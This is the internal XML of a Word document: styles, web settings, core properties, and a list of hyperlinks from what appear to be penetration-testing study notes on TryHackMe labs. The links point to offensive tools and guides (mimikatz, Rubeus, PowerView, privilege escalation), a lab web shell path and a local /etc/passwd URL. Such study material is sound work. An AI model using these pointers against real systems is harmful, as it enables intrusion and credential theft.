      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00781678"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007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678"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="gn">
    <w:name w:val="gn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00781678"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002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7A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002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7A"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000F63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9901">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="774861890">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1129402054">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1516382743">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2038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com/app/getappInfo" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jewel.uploadvulns.thm/%3cdirectory" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.threathunting.se/tag/windows-process/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.harmj0y.net/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pentest-standard.org/index.php/Post_Exploitation" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openwall.com/john/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.org" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=A_TPZxuTzBU" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8080" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzye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danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://demo.uploadvulns.thm/uploads/shell.php" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/Rubeus" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\icmp" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://payatu.com/guide-linux-privilege-escalation" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493862736.pdf" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?page_id=1821" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toool.us/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zaproxy.org/docs/desktop/ui/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\live.sysinternals.com\tools\procmon.exe" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://MACHINE_IP/indexFUZZ%20-w%20/usr/share/seclists/Discovery/Web-Content/web-extensions.txt" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.pwntools.com/en/stable/install.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itly.com/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://faq.cprogramming.com/cgi-bin/smartfaq.cgi?answer=1049157810&amp;id=1043284351" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="ftp://10.10.115.6" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/admin_getappInfo" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/posters/hunt-evil/165/download" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.varonis.com/blog/kerberos-authentication-explained/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://offsec.red/mimikatz-cheat-sheet/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/current-threats/apt-groups.html" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://live.sysinternals.com/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=vW8eAqZyWeo" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:8080" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kali:8834/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/rnmcRTnTNC8" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://MACHINE_IP/FUZZ%20-w%20/usr/share/seclists/Discovery/Web-Content/big.txt" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwndbg/pwndbg" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exploit.education/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///etc/passwd" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jewel.uploadvulns.thm" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/room/linuxprivesc" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.redsiege.com/wp-content/uploads/2020/04/20200430-kerb101.pdf" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://groups.google.com/forum/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adamtheautomator.com/procmon/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://metasploit.help.rapid7.com/docs/about-post-exploitation" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openwall.com/john/doc/RULES.shtml" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aboul3la/Sublist3r" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ffuf/ffuf" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://MACHINE_IP/FUZZ%20-w%20/usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.geeksforgeeks.org/tcp-server-client-implementation-in-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uploadvulns.thm" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/resources/windows-internals" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openwall.com/john/doc/RULES.shtml" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/sw94smSiJBY" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.alldaydevops.com/zap-in-ten" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\live.sysinternals.com\tools\%3ctoolname" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://MACHINE_IP/FUZZ%20-w%20/usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Gallopsled/pwntools" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.siphos.be/2011/07/high-level-explanation-on-some-binary-executable-security/" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/guyinatuxedo/nightmare/tree/master/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1FEF-3EA7-4D79-A711-A7AC2BD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110</Pages>
  <Words>30976</Words>
  <Characters>176566</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rmstrong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nicholas Armstrong</cp:lastModifiedBy>
  <cp:revision>92</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-04T21:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-31T15:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>